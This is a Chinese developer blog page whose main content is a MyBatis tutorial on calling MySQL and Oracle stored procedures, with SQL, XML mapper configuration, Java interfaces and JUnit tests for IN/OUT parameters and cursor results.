href="/2016/05/09/Android/%E3%80%8A%E7%AC%AC%E4%B8%80%E8%A1%8C%E4%BB%A3%E7%A0%81%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0-%E7%AC%AC%E4%B8%80%E7%AB%A0-%E5%BC%80%E5%90%AF%E5%90%AF%E7%A8%8B%EF%BC%8C%E4%BD%A0%E7%9A%84%E7%AC%AC%E4%B8%80%E8%A1%8C%E4%BB%A3%E7%A0%81/"
data-tag="Android,第一行代码"
data-author="" >
<span class="post-title" title="《第一行代码》读书笔记-第一章 开启启程,你的第一行代码">《第一行代码》读书笔记-第一章 开启启程,你的第一行代码</span>
<span class="post-date" title="2016-05-09 09:37:30">2016/05/09</span>
</a>
<a class="Java "
href="/2016/05/06/Effective-Java/%E3%80%8AEffective%20Java%E3%80%8B%E7%AC%94%E8%AE%B004%EF%BC%9A%E9%80%9A%E8%BF%87%E7%A7%81%E6%9C%89%E6%9E%84%E9%80%A0%E5%99%A8%E5%BC%BA%E5%8C%96%E4%B8%8D%E5%8F%AF%E5%AE%9E%E4%BE%8B%E5%8C%96%E7%9A%84%E8%83%BD%E5%8A%9B/"
data-tag="Java,Effective Java"
data-author="" >
<span class="post-title" title="《Effective Java》笔记04:通过私有构造器强化不可实例化的能力">《Effective Java》笔记04:通过私有构造器强化不可实例化的能力</span>
<span class="post-date" title="2016-05-06 17:00:28">2016/05/06</span>
</a>
<a class="Java "
href="/2016/05/06/Effective-Java/%E3%80%8AEffective%20Java%E3%80%8B%E7%AC%94%E8%AE%B003%EF%BC%9A%E7%94%A8%E7%A7%81%E6%9C%89%E6%9E%84%E9%80%A0%E5%99%A8%E6%88%96%E8%80%85%E6%9E%9A%E4%B8%BE%E7%B1%BB%E5%9E%8B%E5%BC%BA%E5%8C%96Singleton%E5%B1%9E%E6%80%A7/"
data-tag="Java,Effective Java"
data-author="" >
<span class="post-title" title="《Effective Java》笔记03:用私有构造器或者枚举类型强化Singleton属性">《Effective Java》笔记03:用私有构造器或者枚举类型强化Singleton属性</span>
<span class="post-date" title="2016-05-06 14:52:19">2016/05/06</span>
</a>
<a class="Android "
href="/2016/05/04/Android/AndroidAnnotations%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B001-AndroidStudio%E9%85%8D%E7%BD%AE/"
data-tag="Android"
data-author="" >
<span class="post-title" title="AndroidAnnotations - AndroidStudio配置">AndroidAnnotations - AndroidStudio配置</span>
<span class="post-date" title="2016-05-04 16:50:40">2016/05/04</span>
</a>
<a class="数据库 "
href="/2016/05/03/redis%E5%AF%86%E7%A0%81%E7%AE%A1%E7%90%86/"
data-tag="redis"
data-author="" >
<span class="post-title" title="redis密码管理">redis密码管理</span>
<span class="post-date" title="2016-05-03 16:42:45">2016/05/03</span>
</a>
<a class="Java "
href="/2016/04/28/Effective-Java/%E3%80%8AEffective%20Java%E3%80%8B%E7%AC%94%E8%AE%B002%EF%BC%9A%E9%81%87%E5%88%B0%E5%A4%9A%E4%B8%AA%E6%9E%84%E9%80%A0%E5%99%A8%E5%8F%82%E6%95%B0%E6%97%B6%E8%A6%81%E8%80%83%E8%99%91%E7%94%A8%E6%9E%84%E5%BB%BA%E5%99%A8/"
data-tag="Java,Effective Java"
data-author="" >
<span class="post-title" title="《Effective Java》笔记02:遇到多个构造器参数时要考虑用构建器 Builder">《Effective Java》笔记02:遇到多个构造器参数时要考虑用构建器 Builder</span>
<span class="post-date" title="2016-04-28 16:27:44">2016/04/28</span>
</a>
<a class="Java "
href="/2016/04/28/Effective-Java/%E3%80%8AEffective%20Java%E3%80%8B%E7%AC%94%E8%AE%B001%EF%BC%9A%E8%80%83%E8%99%91%E7%94%A8%E9%9D%99%E6%80%81%E5%B7%A5%E5%8E%82%E6%96%B9%E6%B3%95%E6%9B%BF%E4%BB%A3%E6%9E%84%E9%80%A0%E5%99%A8/"
data-tag="Java,Effective Java"
data-author="" >
<span class="post-title" title="《Effective Java》笔记01:考虑用静态工厂方法替代构造器">《Effective Java》笔记01:考虑用静态工厂方法替代构造器</span>
<span class="post-date" title="2016-04-28 10:28:20">2016/04/28</span>
</a>
<a class="前端 "
href="/2016/04/26/JavaScript/jQuery-each-%E6%96%B9%E6%B3%95/"
data-tag="JavaScript,jQuery"
data-author="" >
<span class="post-title" title="jQuery each()方法">jQuery each()方法</span>
<span class="post-date" title="2016-04-26 14:39:48">2016/04/26</span>
</a>
<a class="前端 "
href="/2016/04/26/JavaScript/jQuery%20text()%EF%BC%8CparseHTML()%20%E6%96%B9%E6%B3%95/"
data-tag="JavaScript,jQuery"
data-author="" >
<span class="post-title" title="jQuery text(),parseHTML() 方法">jQuery text(),parseHTML() 方法</span>
<span class="post-date" title="2016-04-26 10:24:18">2016/04/26</span>
</a>
<a class="Java "
href="/2016/04/13/Java/log4j%E4%BD%BF%E7%94%A8%E7%AC%94%E8%AE%B0/"
data-tag="Java,log4j"
data-author="" >
<span class="post-title" title="log4j使用笔记">log4j使用笔记</span>
<span class="post-date" title="2016-04-13 22:44:43">2016/04/13</span>
</a>
<a class="Java "
href="/2016/04/12/Java/%E5%B0%86System-out%E8%BE%93%E5%87%BA%E5%88%B0log4j/"
data-tag="Java,log4j"
data-author="" >
<span class="post-title" title="将System.out输出到log4j">将System.out输出到log4j</span>
<span class="post-date" title="2016-04-12 17:24:51">2016/04/12</span>
</a>
<a class="工具 "
href="/2016/03/30/%E6%89%B9%E5%A4%84%E7%90%86%E5%B8%B8%E7%94%A8%E7%89%B9%E6%AE%8A%E7%AC%A6%E5%8F%B7/"
data-tag="dos"
data-author="" >
<span class="post-title" title="批处理常用特殊符号">批处理常用特殊符号</span>
<span class="post-date" title="2016-03-30 20:28:26">2016/03/30</span>
</a>
<a class="工具 "
href="/2016/03/28/%E6%89%B9%E5%A4%84%E7%90%86%E5%90%8C%E6%97%B6%E8%BF%90%E8%A1%8C%E5%A4%9A%E4%B8%AA%E7%A8%8B%E5%BA%8F/"
data-tag="dos"
data-author="" >
<span class="post-title" title="批处理同时运行多个程序">批处理同时运行多个程序</span>
<span class="post-date" title="2016-03-28 21:07:22">2016/03/28</span>
</a>
<a class="前端 "
href="/2016/03/17/JavaScript/JavaScript%E4%B8%ADWindow%E5%AF%B9%E8%B1%A1/"
data-tag="JavaScript"
data-author="" >
<span class="post-title" title="JavaScript中Window对象">JavaScript中Window对象</span>
<span class="post-date" title="2016-03-17 15:46:28">2016/03/17</span>
</a>
<a class="前端 "
href="/2016/03/16/JavaScript/js%E6%93%8D%E4%BD%9Cframeset/"
data-tag="JavaScript,html"
data-author="" >
<span class="post-title" title="js框架间的互相引用">js框架间的互相引用</span>
<span class="post-date" title="2016-03-16 16:55:35">2016/03/16</span>
</a>
<a class="前端 "
href="/2016/03/16/JavaScript/%E5%9C%A8frameset%EF%BC%8Cframe%EF%BC%8Ciframe%E4%B8%AD%E5%A6%82%E4%BD%95%E6%93%8D%E4%BD%9C%E5%85%B6%E4%BB%96%E6%A1%86%E6%9E%B6%E4%B8%AD%E7%9A%84%E9%A1%B5%E9%9D%A2%E4%BB%A5%E5%8F%8A%E5%A6%82%E4%BD%95%E5%88%B7%E6%96%B0%E6%A1%86%E6%9E%B6%E4%B8%AD%E7%9A%84%E9%A1%B5%E9%9D%A2/"
data-tag="JavaScript,html"
data-author="" >
<span class="post-title" title="在frameset,frame,iframe中如何操作其他框架中的页面以及如何刷新框架中的页面">在frameset,frame,iframe中如何操作其他框架中的页面以及如何刷新框架中的页面</span>
<span class="post-date" title="2016-03-16 15:46:59">2016/03/16</span>
</a>
<a class="前端 "
href="/2016/03/16/JavaScript/JavaScript%E5%88%A4%E6%96%AD%E5%8F%98%E9%87%8F%E6%98%AF%E5%90%A6%E4%B8%BAundefined%E4%B8%A4%E7%A7%8D%E6%96%B9%E5%BC%8F%E5%B7%AE%E5%BC%82/"
data-tag="JavaScript"
data-author="" >
<span class="post-title" title="JavaScript判断变量是否为undefined两种方式差异">JavaScript判断变量是否为undefined两种方式差异</span>
<span class="post-date" title="2016-03-16 13:54:56">2016/03/16</span>
</a>
<a class="前端 "
href="/2016/03/16/JavaScript/%E5%9B%BE%E6%A0%87%E9%97%AA%E5%8A%A8%E6%8F%90%E9%86%92%EF%BC%8C%E5%B9%B6%E5%8A%A0%E8%BD%BD%E5%86%85%E5%AE%B9%E5%88%B0%E5%BC%B9%E5%87%BA%E6%A1%86Jquery%E6%8F%92%E4%BB%B6/"
data-tag="JavaScript,jQuery"
data-author="" >
<span class="post-title" title="图标闪动提醒,并加载内容到弹出框jQuery插件">图标闪动提醒,并加载内容到弹出框jQuery插件</span>
<span class="post-date" title="2016-03-16 10:17:53">2016/03/16</span>
</a>
<a class="Java "
href="/2016/03/10/Spring/Spring-3%E6%95%B4%E5%90%88Quartz%E5%AE%9E%E7%8E%B0%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A%A1/"
data-tag="Java,Spring,Quartz"
data-author="" >
<span class="post-title" title="Spring 3整合Quartz实现定时任务">Spring 3整合Quartz实现定时任务</span>
<span class="post-date" title="2016-03-10 23:05:05">2016/03/10</span>
</a>
<a class="数据库 "
href="/2016/03/08/MySQL/SQL-%E4%B8%80%E4%B8%AA%E5%88%86%E7%BB%84%E5%8F%96%E6%9C%80%E5%A4%A7%E5%80%BC%E5%B9%B6%E4%B8%94%E5%8E%BB%E9%87%8D/"
data-tag="SQL"
data-author="" >
<span class="post-title" title="SQL:一个分组取最大值并且去重">SQL:一个分组取最大值并且去重</span>
<span class="post-date" title="2016-03-08 23:08:46">2016/03/08</span>
</a>
<a class="前端 "
href="/2016/03/02/JavaScript/jQuery%E5%85%A8%E9%80%89%E5%8F%8D%E9%80%89/"
data-tag="JavaScript,jQuery"
data-author="" >
<span class="post-title" title="jQuery全选反选">jQuery全选反选</span>
<span class="post-date" title="2016-03-02 11:33:00">2016/03/02</span>
</a>
</nav>
</div>
</div>
<div class="hide-list">
<div class="semicircle">
<div class="brackets first"><</div>
<div class="brackets">></div>
</div>
</div>
</aside>
<div class="post">
<div class="pjax">
<article id="post-MyBatis/MyBatis 08-存储过程" class="article article-type-post" itemscope itemprop="blogPost">
<h1 class="article-title">MyBatis 08-存储过程</h1>
<div class="article-meta">
<span class="book">
<a data-rel="Java">Java</a>
</span>
<span class="tag">
<a class="color5">Java</a>
<a class="color3">MyBatis</a>
</span>
</div>
<div class="article-meta">
创建时间:<time class="date" title='更新时间: 2019-12-01 14:31:58'>2019-12-01 13:54</time>
</div>
<div class="article-meta">
<span>字数:1.3k</span>
<span id="busuanzi_container_page_pv">
阅读:<span id="busuanzi_value_page_pv">
<span class="count-comment">
<span class="spinner">
<div class="cube1"></div>
<div class="cube2"></div>
</span>
</span>
</span>
</span>
<span class="top-comment" title="跳转至评论区">
<a href="#comments">
评论:<span class="count-comment">
<span class="spinner">
<div class="cube1"></div>
<div class="cube2"></div>
</span>
</span>
</a>
</span>
</div>
<div class="toc-ref">
<ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#根据用户-id-查询用户其他信息"><span class="toc-text">根据用户 id 查询用户其他信息</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#简单的根据用户名和分页参数进行查询,返回总数和分页数据"><span class="toc-text">简单的根据用户名和分页参数进行查询,返回总数和分页数据</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#添加删除用户"><span class="toc-text">添加删除用户</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#在-Oracle-中使用游标参数的存储过程"><span class="toc-text">在 Oracle 中使用游标参数的存储过程</span></a></li></ol>
<style>
.left-col .switch-btn,
.left-col .switch-area {
display: none;
}
.toc-level-3 i,
.toc-level-3 ol {
display: none !important;
}
</style>
</div>
<div class="article-entry" itemprop="articleBody">
<blockquote>
<p><a href="http://www.broadview.com.cn/book/3643" target="_blank" rel="noopener">http://www.broadview.com.cn/book/3643</a><br><a href="https://github.com/mybatis-book/book" target="_blank" rel="noopener">https://github.com/mybatis-book/book</a></p>
</blockquote>
<h1 id="根据用户-id-查询用户其他信息"><a href="#根据用户-id-查询用户其他信息" class="headerlink" title="根据用户 id 查询用户其他信息"></a>根据用户 id 查询用户其他信息</h1><pre><code class="sql"># 根据用户 id 查询用户其他信息
# 方法看着很奇葩,但是展示了多个输出参数
DROP PROCEDURE IF EXISTS `select_user_by_id`;
DELIMITER ;;
CREATE PROCEDURE `select_user_by_id`(
IN userId BIGINT,
OUT userName VARCHAR(50),
OUT userPassword VARCHAR(50),
OUT userEmail VARCHAR(50),
OUT userInfo TEXT,
OUT headImg BLOB,
OUT createTime DATETIME)
BEGIN
# 根据用户 id 查询其他数据
select user_name,user_password,user_email,user_info,head_img,create_time
INTO userName,userPassword,userEmail,userInfo,headImg,createTime
from sys_user
WHERE id = userId;
END
;;
DELIMITER ;</code></pre>
<pre><code class="xml"><select id="selectUserById" statementType="CALLABLE" useCache="false">
{call select_user_by_id(
#{id, mode=IN},
#{userName, mode=OUT, jdbcType=VARCHAR},
#{userPassword, mode=OUT, jdbcType=VARCHAR},
#{userEmail, mode=OUT, jdbcType=VARCHAR},
#{userInfo, mode=OUT, jdbcType=VARCHAR},
#{headImg, mode=OUT, jdbcType=BLOB, javaType=_byte[]},
#{createTime, mode=OUT, jdbcType=TIMESTAMP}
)}
</select></code></pre>
<p>在调用存储过程的方法中,需要把 statementType 设置为 CALLABLE,在使用 select 标签调用存储过程时,由于存储过程不支持二级缓存,因此避免出错将 useCache 设置为 false。</p>
<p>在存储过程中使用参数时,除了写上必要的属性名,还必须指定参数的 mode,可选值 IN(入参),OUT(出参),INOUT(输入输出)。OUT 模式必须指定 jdbcType。在使用 Oracle 时,如果入参存在 null 的情况,那么入参也必须指定 jdbcType。</p>
<pre><code class="java">void selectUserById(SysUser user);</code></pre>
<p>这个存储过程没有返回值(不要和出参混淆)。</p>
<p>使用出参方式时,使用 JavaBean 对象接收出参时,必须保证所有出参在 JavaBean 中都有对应的属性存在,否则会抛出类似 “Could not set property 'xxx'” 这样的错误。使用 Map 类型接收出参时不需要保证所有出参都有对应的属性。</p>
<h1 id="简单的根据用户名和分页参数进行查询,返回总数和分页数据"><a href="#简单的根据用户名和分页参数进行查询,返回总数和分页数据" class="headerlink" title="简单的根据用户名和分页参数进行查询,返回总数和分页数据"></a>简单的根据用户名和分页参数进行查询,返回总数和分页数据</h1><pre><code class="sql"># 简单的根据用户名和分页参数进行查询,返回总数和分页数据
DROP PROCEDURE IF EXISTS `select_user_page`;
DELIMITER ;;
CREATE PROCEDURE `select_user_page`(
IN userName VARCHAR(50),
IN _offset BIGINT,
IN _limit BIGINT,
OUT total BIGINT)
BEGIN
# 查询数据总数
select count(*) INTO total
from sys_user
where user_name like concat('%', userName, '%');
# 分页查询数据
select *
from sys_user
where user_name like concat('%', userName, '%')
limit _offset, _limit;
END
;;
DELIMITER ;</code></pre>
<pre><code class="xml"><select id="selectUserPage" statementType="CALLABLE" useCache="false" resultMap="userMap">
{call select_user_page(
#{userName, mode=IN},
#{offset, mode=IN},
#{limit, mode=IN},
#{total, mode=OUT, jdbcType=BIGINT}
)}
</select></code></pre>
<p>select 标签设置了 resultMap,因为该方法通过 total 出参得到了查询的总数,通过存储过程返回了最后的结果集,所以需要设置返回值信息。</p>
<pre><code class="java">/**
* 使用存储过程分页查询
*
* @param userName
* @param pageNum
* @param pageSize
* @param total
* @return
*/
List<SysUser> selectUserPage(Map<String, Object> params);</code></pre>
<pre><code class="java">@Test
public void testSelectUserPage(){
// 获取 sqlSession
SqlSession sqlSession = getSqlSession();
try {
// 获取 UserMapper 接口
UserMapper userMapper = sqlSession.getMapper(UserMapper.class);
Map<String, Object> params = new HashMap<String, Object>();
params.put("userName", "ad");
params.put("offset", 0);
params.put("limit", 10);
List<SysUser> userList = userMapper.selectUserPage(params); // 也可以使用 JavaBean
Long total = (Long) params.get("total");
System.out.println("总数:" + total);
for(SysUser user : userList){
System.out.println("用户名:" + user.getUserName());
}
} finally {
// 不要忘记关闭 sqlSession
sqlSession.close();
}
}</code></pre>
<h1 id="添加删除用户"><a href="#添加删除用户" class="headerlink" title="添加删除用户"></a>添加删除用户</h1><pre><code class="sql"># 保存用户信息和角色关联信息
DROP PROCEDURE IF EXISTS `insert_user_and_roles`;
DELIMITER ;;
CREATE PROCEDURE `insert_user_and_roles`(
OUT userId BIGINT,
IN userName VARCHAR(50),
IN userPassword VARCHAR(50),
IN userEmail VARCHAR(50),
IN userInfo TEXT,
IN headImg BLOB,
OUT createTime DATETIME,
IN roleIds VARCHAR(200)
)
BEGIN
# 设置当前时间
SET createTime = NOW();
# 插入数据
INSERT INTO sys_user(user_name, user_password, user_email, user_info, head_img, create_time)
VALUES (userName, userPassword, userEmail, userInfo, headImg, createTime);
# 获取自增主键
SELECT LAST_INSERT_ID() INTO userId;
# 保存用户和角色关系数据
SET roleIds = CONCAT(',',roleIds,',');
INSERT INTO sys_user_role(user_id, role_id)
select userId, id from sys_role
where INSTR(roleIds, CONCAT(',',id,',')) > 0;
END
;;
DELIMITER ;</code></pre>
<pre><code class="sql"># 删除用户信息和角色关联信息
DROP PROCEDURE IF EXISTS `delete_user_by_id`;
DELIMITER ;;
CREATE PROCEDURE `delete_user_by_id`(IN userId BIGINT)
BEGIN
DELETE FROM sys_user_role where user_id = userId;
DELETE FROM sys_user where id = userId;
END
;;
DELIMITER ;</code></pre>
<pre><code class="xml"><insert id="insertUserAndRoles" statementType="CALLABLE">
{call insert_user_and_roles(
#{user.id, mode=OUT, jdbcType=BIGINT},
#{user.userName, mode=IN},
#{user.userPassword, mode=IN},
#{user.userEmail, mode=IN},
#{user.userInfo, mode=IN},
#{user.headImg, mode=IN, jdbcType=BLOB},
#{user.createTime, mode=OUT, jdbcType=TIMESTAMP},
#{roleIds, mode=IN}
)}
</insert>
<delete id="deleteUserById" statementType="CALLABLE">
{call delete_user_by_id(#{id, mode=IN})}
</delete></code></pre>
<pre><code class="java">/**
* 保存用户信息和角色关联信息
*/
int insertUserAndRoles(@Param("user")SysUser user, @Param("roleIds")String roleIds);
/**
* 根据用户 id 删除用户和用户的角色信息
*/
int deleteUserById(Long id);</code></pre>
<h1 id="在-Oracle-中使用游标参数的存储过程"><a href="#在-Oracle-中使用游标参数的存储过程" class="headerlink" title="在 Oracle 中使用游标参数的存储过程"></a>在 Oracle 中使用游标参数的存储过程</h1><pre><code class="sql">create or replace procedure SELECT_COUNTRIES(
ref_cur1 out sys_refcursor,
ref_cur2 out sys_refcursor) is
begin
open ref_cur1 for select * from country where id < 3;
open ref_cur2 for select * from country where id >= 3;
end SELECT_COUNTRIES;</code></pre>
<p>这个存储过程只有两个游标类型的出参,游标对应的值就是两个简单的 SQL。</p>
<pre><code class="xml"><select id="selectCountries" statementType="CALLABLE" useCache="false">
{call SELECT_COUNTRIES(
#{list1, mode=OUT, jdbcType=CURSOR, javaType=ResultSet, resultMap=BaseResultMap},
#{list2, mode=OUT, jdbcType=CURSOR, javaType=ResultSet, resultMap=BaseResultMap}
)}
</select></code></pre>
<p>使用游标类型时,注意设置 <code>jdbcType=CURSOR</code>, <code>javaType=ResultSet</code></p>
<pre><code class="java">/**
* 执行 Oracle 中的存储过程
*/
Object selectCountries(Map<String, Object> params);</code></pre>
<pre><code class="java">@Test
public void testMapperWithStartPage3() {
SqlSession sqlSession = getSqlSession();
CountryMapper countryMapper = sqlSession.getMapper(CountryMapper.class);
try {
// 获取第1页,10条内容,默认查询总数count
Map<String, Object> params = new HashMap<String, Object>();
countryMapper.selectCountries(params);
List<Country> list1 = (List<Country>) params.get("list1");
List<Country> list2 = (List<Country>) params.get("list2");
Assert.assertNotNull(list1);
Assert.assertNotNull(list2);
} finally {
sqlSession.close();
}
}</code></pre>
<hr><span style="font-style: italic;color: gray;"> 转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 bin07280@qq.com </span>
</div>
</article>
<div class="article_copyright">
<p><span class="copy-title">文章标题:</span>MyBatis 08-存储过程</p>
<p><span class="copy-title">文章字数:</span><span class="post-count">1.3k</span></p>
<p><span class="copy-title">本文作者:</span><a title="Bin">Bin</a></p>
<p><span class="copy-title">发布时间:</span>2019-12-01, 13:54:52</p>
<p><span class="copy-title">最后更新:</span>2019-12-01, 14:31:58</p>
<span class="copy-title">原始链接:</span><a class="post-url" href="/2019/12/01/MyBatis/MyBatis%2008-%E5%AD%98%E5%82%A8%E8%BF%87%E7%A8%8B/" title="MyBatis 08-存储过程">http://coolview.github.io/2019/12/01/MyBatis/MyBatis%2008-%E5%AD%98%E5%82%A8%E8%BF%87%E7%A8%8B/</a>
<p>
<span class="copy-title">版权声明:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
</p>
</div>
<section id="comments" class="disqus">
<style> aside.comment-bar { margin: auto 30px; }</style>
<div id="disqus_thread"></div>
<script>
var disqus_config = function(){
this.page.url = 'http://coolview.github.io/2019/12/01/MyBatis/MyBatis%2008-%E5%AD%98%E5%82%A8%E8%BF%87%E7%A8%8B/';
this.page.identifier = '2019/12/01/MyBatis/MyBatis 08-存储过程/';
};
var loadComment = function(){
var d = document, s = d.createElement('script');
s.src = '//coolview.disqus.com/embed.js';
s.setAttribute('data-timestamp', +new Date());
(d.head || d.body).appendChild(s);
}
</script>
<aside class="comment-bar">
<a>
<i class="fa fa-commenting-o animated infinite pulse"></i>
<i class="fa fa-spinner fa-pulse"></i>
<span class="count-comment"></span>
</a>
</aside>
<script>
var isLoadComments = false;
var $commentBar = $("#comments aside.comment-bar");
var load$hide = function(){
if(isLoadComments){
return;
}
isLoadComments = true;
if(isLoadComments )
$commentBar.find("a > i").toggle();
loadComment();
$commentBar.fadeOut(800);
}
$commentBar.click(function(){
load$hide();
})
$commentBar.children("a").mouseenter(function(){
load$hide();
})
</script>
</section>
<!-- Add comment count-->
<span class="disqus-comment-count" style="display: none" data-disqus-identifier="2019/12/01/MyBatis/MyBatis 08-存储过程/"></span>
<span class="disqus-comment-count" style="display: none" data-disqus-url="http://coolview.github.io/2019/12/01/MyBatis/MyBatis%2008-%E5%AD%98%E5%82%A8%E8%BF%87%E7%A8%8B/"></span>
</div>
<div class="copyright">
<p class="footer-entry">©2016-2019 CoolView</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>
</div>
<div class="full-toc">
<button class="full"><span class="min "></span></button>
<button class="post-toc-menu"><span class="post-toc-menu-icons"></span></button>
<div class="post-toc"><span class="post-toc-title">目录</span>
<div class="post-toc-content">
</div>
</div>
<a class="" id="rocket" ></a>
</div>
</div>
<div class="acParent"></div>
</body>
<script src="/js/jquery.pjax.js?v=1.0.1" ></script>
<script src="//cdn.bootcss.com/photoswipe/4.1.2/photoswipe.min.js"></script>
<script src="//cdn.bootcss.com/photoswipe/4.1.2/photoswipe-ui-default.min.js"></script>
<script src="/js/script.js?v=1.0.1" ></script>
<script>
var img_resize = 'photoSwipe';
/*作者、标签的自动补全*/
$(function () {
$('.search').AutoComplete({
'data': ['#IntelliJ','#MQTT','#Python','#技巧','#Windows','#编码','#Java','#Nginx','#VSCode','#dos','#sublime','#redis','#Docker','#Git','#Hexo','#支付宝','#Android','#第一行代码','#Effective Java','#设计模式','#JUnit','#Tomcat','#log4j','#JavaScript','#jQuery','#Java编程思想','#html','#MongoDB','#Linux','#MyBatis','#Mybatis','#MySQL','#SQL','#Spring','#数据结构','#大话数据结构','#Shiro','#Quartz',],
'itemHeight': 20,
'width': 418
}).AutoComplete('show');
})
function initArticle() {
/*渲染对应的表格样式*/
$(".post .pjax table").addClass("green_title");
/*渲染打赏样式*/
/*高亮代码块行号*/
$('pre code').each(function(){
var lines = $(this).text().split('\n').length - 1, widther='';
if (lines>99) {
widther = 'widther'
}
var $numbering = $('<ul/>').addClass('pre-numbering ' + widther).attr("unselectable","on");
$(this).addClass('has-numbering ' + widther)
.parent()
.append($numbering);
for(var i=1;i<=lines;i++){
$numbering.append($('<li/>').text(i));
}
});
/*访问数量*/
$.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
/*代码高亮,行号对齐*/
$('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));
// PhotoSwipe
$('article').each(function(i){
$(this).find('img').each(function(){
if ($(this).closest('figure').hasClass('article-gallery-img')) {
return;
}
var alt = this.alt;
$(this)
.wrap('<figure class="article-gallery-img" itemprop="associatedMedia" itemscope itemtype="http://schema.org/ImageObject"></figure>')
.wrap('<a href="' + this.src + '" title="' + alt + '"></a>');
$(this).after('<div class="img_alt"><span>' + (alt || '') + '</span></div>');
});
});
var pswpElement = document.querySelectorAll('.pswp')[0];
if (pswpElement) {
var gallerySelector = '.article-gallery, article';
var initPhotoSwipeFromDOM = function(gallerySelector) {
// parse slide data (url, title, size ...) from DOM elements
// (children of gallerySelector)
var parseThumbnailElements = function(el) {
var thumbElements = $(el).find('figure.article-gallery-img').toArray(),
numNodes = thumbElements.length,
items = [],
figureEl,
linkEl,
size,
imgEl,
item;
for (var i = 0; i < numNodes; i++) {
figureEl = thumbElements[i]; // <figure> element
// include only element nodes
if (figureEl.nodeType !== 1) {
continue;
}
linkEl = figureEl.children[0]; // <a> element
imgEl = linkEl.children[0]; // <img>
size = linkEl.getAttribute('data-size');
size = size && size.split('x');
// create slide object
item = {
src: linkEl.getAttribute('href'),
w: size && parseInt(size[0], 10) || imgEl.width,
h: size && parseInt(size[1], 10) || imgEl.height
};
if (figureEl.children.length > 1) {
// <figcaption> content
item.title = figureEl.children[1].innerHTML;
}
if (linkEl.children.length > 0) {
// <img> thumbnail element, retrieving thumbnail url
item.msrc = linkEl.children[0].getAttribute('src');
}
item.el = figureEl; // save link to element for getThumbBoundsFn
items.push(item);
}
return items;
};
// find nearest parent element
var closest = function closest(el, fn) {
return el && (fn(el) ? el : closest(el.parentNode, fn));
};
// triggers when user clicks on thumbnail
var onThumbnailsClick = function(e) {
e = e || window.event;
var eTarget = e.target || e.srcElement;
// find root element of slide
var clickedListItem = closest(eTarget, function(el) {
return (el.tagName && el.tagName.toUpperCase() === 'FIGURE');
});
if (!clickedListItem) {
return;
}
if (e.preventDefault) {
e.preventDefault();
} else {
e.returnValue = false;
}
// find index of clicked item by looping through all child nodes
// alternatively, you may define index via data- attribute
var clickedGallery = $(clickedListItem).closest(gallerySelector)[0],
childNodes = $(clickedGallery).find('figure.article-gallery-img').toArray(),
numChildNodes = childNodes.length,
nodeIndex = 0,
index;
for (var i = 0; i < numChildNodes; i++) {
if (childNodes[i].nodeType !== 1) {
continue;
}
if (childNodes[i] === clickedListItem) {
index = nodeIndex;
break;
}
nodeIndex++;
}
if (index >= 0) {
// open PhotoSwipe if valid index found
openPhotoSwipe(index, clickedGallery);
}
return false;
};
// parse picture index and gallery index from URL (#&pid=1&gid=2)
var photoswipeParseHash = function() {
var hash = window.location.hash.substring(1),
params = {};
if (hash.length < 5) {
return params;
}
var vars = hash.split('&');
for (var i = 0; i < vars.length; i++) {
if (!vars[i]) {
continue;
}
var pair = vars[i].split('=');
if (pair.length < 2) {
continue;
}
params[pair[0]] = pair[1];
}
if (params.gid) {
params.gid = parseInt(params.gid, 10);
}
return params;
};
var openPhotoSwipe = function(index, galleryElement, disableAnimation, fromURL) {
var pswpElement = document.querySelectorAll('.pswp')[0],
gallery,
options,
items;
items = parseThumbnailElements(galleryElement);
// define options (if needed)
options = {
// define gallery index (for URL)
galleryUID: galleryElement.getAttribute('data-pswp-uid'),
getThumbBoundsFn: function(index) {
// See Options -> getThumbBoundsFn section of documentation for more info
var thumbnail = items[index].el.getElementsByTagName('img')[0], // find thumbnail
pageYScroll = window.pageYOffset || document.documentElement.scrollTop,
rect = thumbnail.getBoundingClientRect();
return {
x: rect.left,
y: rect.top + pageYScroll,
w: rect.width
};
}
};
// PhotoSwipe opened from URL
if (fromURL) {
if (options.galleryPIDs) {
// parse real index when custom PIDs are used
// http://photoswipe.com/documentation/faq.html#custom-pid-in-url
for (var j = 0; j < items.length; j++) {
if (items[j].pid == index) {
options.index = j;
break;
}
}
} else {
// in URL indexes start from 1
options.index = parseInt(index, 10) - 1;
}
} else {
options.index = parseInt(index, 10);
}
// exit if index not found
if (isNaN(options.index)) {
return;
}
if (disableAnimation) {
options.showAnimationDuration = 0;
}
// Pass data to PhotoSwipe and initialize it
gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, options);
gallery.listen('imageLoadComplete', function(index, item) {
var linkEl = item.el.children[0];
var img = item.container.children[0];
if (!linkEl.getAttribute('data-size')) {
linkEl.setAttribute('data-size', img.naturalWidth + 'x' + img.naturalHeight);
item.w = img.naturalWidth;
item.h = img.naturalHeight;
gallery.invalidateCurrItems();
gallery.updateSize(true);
}
});
gallery.init();
};
// loop through all gallery elements and bind events
var galleryElements = document.querySelectorAll(gallerySelector);
for (var i = 0, l = galleryElements.length; i < l; i++) {
galleryElements[i].setAttribute('data-pswp-uid', i + 1);
galleryElements[i].onclick = onThumbnailsClick;
}
// Parse URL and open gallery if it contains #&pid=3&gid=1
var hashData = photoswipeParseHash();
if (hashData.pid && hashData.gid) {
openPhotoSwipe(hashData.pid, galleryElements[hashData.gid - 1], true, true);
}
};
// execute above function
initPhotoSwipeFromDOM(gallerySelector);
}
}
/*打赏页面隐藏与展示*/
</script>
<!--加入行号的高亮代码块样式-->
<style>
pre{
position: relative;
margin-bottom: 24px;
border-radius: 10px;
